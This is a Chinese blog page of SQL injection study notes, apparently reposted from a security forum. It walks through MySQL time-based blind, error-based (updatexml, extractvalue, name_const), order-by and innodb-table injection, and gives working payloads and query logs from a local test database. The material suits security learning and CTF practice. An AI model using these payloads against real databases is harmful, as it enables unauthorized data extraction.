sql 注入中的有趣知识总结

最新推荐文章于 2021-01-27 17:13:48 发布
最新推荐文章于 2021-01-27 17:13:48 发布
阅读量253 收藏
点赞数
原文链接:https://xz.aliyun.com/t/5505#toc-3
版权

基于时间的盲注 sql注入

BENCHMARK(count,expr)

benchmark 函数会重复执行expr表达式count次,我们尽可能多的执行expr来达到延时的作用
在这里插入图片描述###### sleep(time)
在这里插入图片描述###### 笛卡尔积
我们进行多表合并,耗费较长时间,达到延时的效果
在这里插入图片描述###### get_lock()

1.开了一个session,对关键字进行了get_lock. (get_lock(‘a’,5))
2.那么再开另一个session再次对关键进行get_lock. 就会延时我们指定的时间。get_lock(‘a’,5)

2个session是主要

在这里插入图片描述

报错注入

name_const

mysql列名重复会导致报错,通过name_const制造一个列
在这里插入图片描述
但有个约束条件就是version()所对应的值必须是常量,否则会报错
![在这里插入图片描述](https://img-blog.csdnimg.cn/20190731125554517.png
我们可以利用mysql列名重复会导致报错这个原理配合join函数得到列名
using 等价join 中的On

mysql root@localhost:classmgr> select * from (select * from  admin a join admin b)x;
(1060, u"Duplicate column name 'id'")
mysql root@localhost:classmgr> select * from (select * from  admin a join admin b using(id))x;
(1060, u"Duplicate column name 'username'")
mysql root@localhost:classmgr> select * from (select * from  admin a join admin b using(id,username))x;
(1060, u"Duplicate column name 'password'")
mysql root@localhost:classmgr> select * from (select * from  admin a join admin b using(id,username,password))x;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
| 1  | admin    | CF60265A469500B5FF25CC10E4AB78D1 |
+----+----------+----------------------------------+
1 row in set
Time: 0.011s
xpath语法报错

1.updatexml
不符合规定的Xpath,MySQL就会报语法错误,并显示XPath的内容.,且从特殊字符开始报错

mysql root@localhost:classmgr> select updatexml(1,(select user()),1);
(1105, u"XPATH syntax error: '@localhost'")
mysql root@localhost:classmgr> select user();
+----------------+
| user()         |
+----------------+
| root@localhost |
+----------------+
1 row in set
Time: 0.013s
mysql root@localhost:classmgr>

故添加聚合函数

mysql root@localhost:classmgr> select updatexml(1,concat('~',(select user()),'~'),1);
(1105, u"XPATH syntax error: '~root@localhost~'")
mysql root@localhost:classmgr>

extractvalue报错原理与上面一样

mysql root@localhost:classmgr> select extractvalue(1,concat('~',(select user())));
(1105, u"XPATH syntax error: '~root@localhost'")
整数溢出

~0,pow(),cot(),exp()
我们对数值0逐位取反,会报BIGINT溢出错误。

mysql root@localhost:classmgr> select ~0
+----------------------+
| ~0                   |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set
Time: 0.010s
mysql root@localhost:classmgr> select 1+~0
(1690, u"BIGINT UNSIGNED value is out of range in '(1 + ~(0))'")
mysql root@localhost:classmgr> select 1-~0
(1690, u"BIGINT UNSIGNED value is out of range in '(1 - ~(0))'")

用于注入中,我们知道,如果一个查询成功返回,其返回值为0,所以对其进行逻辑非的话就会变成1

mysql root@localhost:classmgr> select  !(select user())x;
+---+
| x |
+---+
| 1 |
+---+
1 row in set
Time: 0.364s
mysql root@localhost:classmgr>

但应该是mysql版本问题,网上说的报数据的方法没有成功

几何函数报错

几何函数进行报错注入,如polygon(),linestring()函数等,网上说的报数据的方法没有成功

mysql root@localhost:classmgr> select * from admin where id=1 and polygon(id);
(1367, u"Illegal non geometric '`classmgr`.`admin`.`id`' value found during parsing")
mysql root@localhost:classmgr> select * from admin where id=1 and linestring(id);
(1367, u"Illegal non geometric '`classmgr`.`admin`.`id`' value found during parsing")
对于insert,delete,update三种操作的注入
mysql root@localhost:classmgr> insert into admin(id,username,password)  values ('1' or updatexml(1,concat('~',(select database()),0x7e),1) or '','2');
(1105, u"XPATH syntax error: '~classmgr~'")

mysql root@localhost:classmgr> update admin set username=1 where id=1  and updatexml(1,concat('~',(select user())),1);
(1105, u"XPATH syntax error: '~root@localhost'")
mysql root@localhost:classmgr>

mysql root@localhost:classmgr> delete from admin where id=1   and updatexml(1,concat('~',(select user())),1);
(1105, u"XPATH syntax error: '~root@localhost'")

insert ,update,delete的时间盲注与此类似

order by 注入

布尔盲注

rand(false)与rand(true)的显示效果不同
在这里插入图片描述##### 时间盲注

mysql root@localhost:classmgr> select * from admin order by 1 and if(substr((select database()),1,1)='c',sleep(4),1);
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
| 1  | admin    | CF60265A469500B5FF25CC10E4AB78D1 |
+----+----------+----------------------------------+
1 row in set
Time: 0.011s

MySQL数据库的Innodb引擎的注入

此时可以通过innodb引擎进行注入(innodb引擎开启),在Mysql 5.6以上的版本中,在系统Mysql库中存在两张与innodb相关的表:innodb_table_stats和innodb_index_stats。当然这需要root权限

mysql root@(none):CTFd> select * from runoob_tbl where runoob_id=1 union select group_concat(table_name),2,3,4 from mysql.innodb_index_stats where database_name=database();
+----------------------------------+--------------+---------------+-----------------+
| runoob_id                        | runoob_title | runoob_author | submission_date |
+----------------------------------+--------------+---------------+-----------------+
| 1                                | aa           | bb            | <null>          |
| runoob_tbl,runoob_tbl,runoob_tbl | 2            | 3             | 4               |
+----------------------------------+--------------+---------------+-----------------+


mysql root@(none):CTFd> select * from runoob_tbl where runoob_id=1 union select group_concat(database_name),2,3,4 from mysql.innodb_index_stats
+----------------------------------------+--------------+---------------+-----------------+
| runoob_id                              | runoob_title | runoob_author | submission_date |
+----------------------------------------+--------------+---------------+-----------------+
| 1                                      | aa           | bb            | <null>          |
| CTFd,CTFd,CTFd,mysql,mysql,mysql,mysql | 2            | 3             | 4               |
+----------------------------------------+--------------+---------------+-----------------+
2 rows in set
Time: 0.012s

查询innodb_table_stats也可以

参考资料
https://xz.aliyun.com/t/5505#toc-3

as-root
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MysqlHex()和Unhex()函数详解
zxyolo的博客
02-21 9929
一、Hex()和Unhex()函数 hex():将一个字符串或数字转换为十六进制格式的字符串。 unhex():把十六进制格式的字符串转化为原来的格式。每对十六进制数字转化为一个字符。执行hex(str)的逆运算。即,它将参数的每对十六进制数字解释为一个数字,并将其转换为该数字表示的字符。结果字符将作为二进制字符串返回。参数字符串的字符必须为合法的十六进制数字:“ 0” ..“ 9”,“ A” ..“ F”,“ a” ..“ f”。如果UNHEX在参数遇到任何非十六进制数字,则返回NULL。 ..
CTFshow sql注入 上篇(web221-253)
Kradress的博客
04-20 4612
目录前言思路题解总结 前言 输入源码 思路 ################################ 题解 ################################ 总结
MYSQL 通过NAME_CONST()报错注入
Ciyaso的博客
01-18 1874
函数解释 NAME_CONST(name,value) Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants. mysql> SELECT NAME_CONST('myname', 14); +--------+ | myname | +-----
SQL注入总结
Lethe's Blog
07-16 1368
一直想刷一下SQL-Labs,最近终于开始行动。刷题之前,先总结一下Mysql注入过程常用的一些知识点吧! 一、基本知识 1、常用函数 (1)查看当前数据库版本 version() @@version @@global.version (2)查看当前登陆用户 user() current_user() system_user() session_user() (3)当前使用的数据库 ...
基于布尔的盲注,基于时间的盲注,针对insert、update、delete语句的注入
坚持硬核
03-05 736
一般web应用凡是需要搜索数据库的功能模块,往往将搜索到的内容显示出来,这样就可能存在get注入和post注入sql注入,但是有些功能模块,并不会将搜索到数据原样显示,而是显示是否存在某数据。这样就只能用基于布尔的盲注了 演示: 盲注字典: 猜解库名: 猜解库名长度:id=1 and length(database())>5 猜解库名的各个字符是多少:id=1 an...
ASP.NET视频教程,有开发素材、视频、源码和毕业总结
03-02
10. **毕业总结**:通常在教程的最后,会有一个综合性的项目,让学习者运用所学知识完成一个完整的Web应用,这有助于检验和巩固学习成果。 本教程提供的SWF格式文件可能是一个互动式的多媒体教学资源,通过动画和...
攻防世界—-(web进阶)FlatScience–WP
12-14
通过分析,我们发现存在SQL注入的可能性。我们利用这个漏洞构造了三个SQL查询语句: 1. 查询密码的SQL:`usr='%27 UNION SELECT id, password from Users--' + &pw=chybeta` 2. 查询用户的SQL:`usr='%27 UNION ...
GbookOfCool留言本_gbookofcool(毕设 + 课设).zip
06-28
防止SQL注入、XSS攻击等是开发过程必须考虑的因素,这可能涉及到对用户输入的验证和编码。 7. **测试与调试**:"Thumbs.db"是一个Windows系统自动生成的图片预览文件,可能暗示开发者在项目开发过程使用了图片...
CTF-Mobile-Tutorial:我写的一些Mobile CTF题解
03-28
Java代码可能存在的漏洞包括但不限于SQL注入、XSS跨站脚本、权限滥用、未加密敏感数据等。理解Java语言的特性以及如何避免这些常见漏洞至关重要。 三、Android逆向工程 逆向工程是分析移动应用安全的重要手段。通过...
微信小程序开发-游戏类-疯狂吃月饼(node+mysql)案例源码.zip
12-12
对用户输入进行验证和过滤,防止SQL注入攻击;定期备份数据库,以防数据丢失。 总结来说,通过这个“疯狂吃月饼”微信小程序游戏的开发案例,开发者不仅可以掌握微信小程序的前端开发技术,还能深入理解Node.js后端...
mysql 的奇葩问题:NAME_CONST
weixin_34018169的博客
04-10 1314
mysql的奇葩问题:NAME_CONST本人在一次项目开发,开发了一个sp.这个sp很简单,就是表的内连接,然后将数据展现出来.代码如下:delimiter$$createproceduresp_dkh_single()beginset@m=0;set@1=0;selectA.tel,B.dkhidfrom(selectm()...
mysql name const_procedure的mysql内部函数NAME_CONST
weixin_42318912的博客
01-27 689
mysql存储过程的本地变量会被一个内部函数name_const转化,似乎是专门为存储过程设计的,没有提到有其它特别之处.delimiter //create procedure pload()BEGINdeclare j int default 1;while j<=1000000doinsert into test(id2,name) values(j,'aaaaaaaaaaaaaaa...
sql注入学习笔记
cherrie007的博客
07-20 427
内容纲要: 1、 updatexml() 报错 2、 extractvalue() 报错 3、 floor()、count(*)、random()报错 4、 name_const() 报错一、updatexml() 【限制了最大长度为32位】 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_docum
SQL注入回顾篇(一)
JBlock的博客
02-28 1630
前言 忆往昔,峥嵘岁月稠!大学已经到了大三了,打了很多比赛,回顾还是挺欣慰!此系列来由是想留一点东西,把所学知识整理一下,同时也是受github上Micro8分享的启发,故想做一些工作,以留后人参考,历时两个星期,第一系列SQL注入回顾篇出炉!内容分四节发布,其SQL注入代码审计为两节,WAF绕过总结为1节,SQLMAP使用总结为1节!此为SQL注入代码审计第一部分。欢迎各位斧正,交流! 文章目...
MySQL报错注入函数汇总
Au
06-12 5114
常用函数 字符串连接函数,将多个字符串连接成一个字符串,当间字符串有一个为空时,最后结果也为空 concat(str1, str2, str3 ,...) concat_ws('指定分隔符', str1,str2,str3...) 开头指定分隔符,与concat()不同,它会自动忽略间的空值,只有分隔符为空,整体才返回空 group_concat...
CTFd平台搭建记录
0verWatch的博客
05-31 5485
前言 其实这些内容在官方文档都有,只是想在博客再记录一下,提高一下自己的熟悉程度 正文 CTFd平台是在flask框架下写的,所以得先安装flask 安装pip sudo apt install python-pip 安装Flask sudo pip install Flask 下载&amp;amp;安装&amp;amp;运行CTFd cd CTFd-1.0.5/ su...
ASP外观专利图像检索平台(源代码+论文).rar
07-21
ASP外观专利图像检索平台(源代码+论文)
C++课程设计:电煤气管理系统【源码+文档】
最新发布
07-21
C++课程设计:电煤气管理系统【源码+文档】 本程序是一个水电气管理信息系统,能够对高校的水电气费用进行管理, 包括了成员的基本信息,如学号、编号、姓名、成员水电气的用量等。程序的用途包括缴纳水电气费、查询一个同学水电气费用量、查看所有同学的缴费情况、增加学生信息、删除学生信息、退出系统等。在设计时也考虑到学生和教师在用水电气时的不同,学生可以免费使用一定额度的水电气,超过这个额度的以后必须付费,且付费部分水电气费的价格要高于教工的收费标准,该措施的实行是为了鼓励同学们节约资源,以免造成不必要的资源浪费。该软件主要是为了学校的管理人员提供便捷,以更快的完成水电气费用的收缴。该软件本着简洁明了,实用稳定为一体进行设计。 系统将实现以下功能: (1)实现对用户信息的录入; (2)实现水电煤气数据的录入; (3)实现计算并查询用户应缴费用,查询未缴纳费用的名单; (4)实现对人员的删除和添加;

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值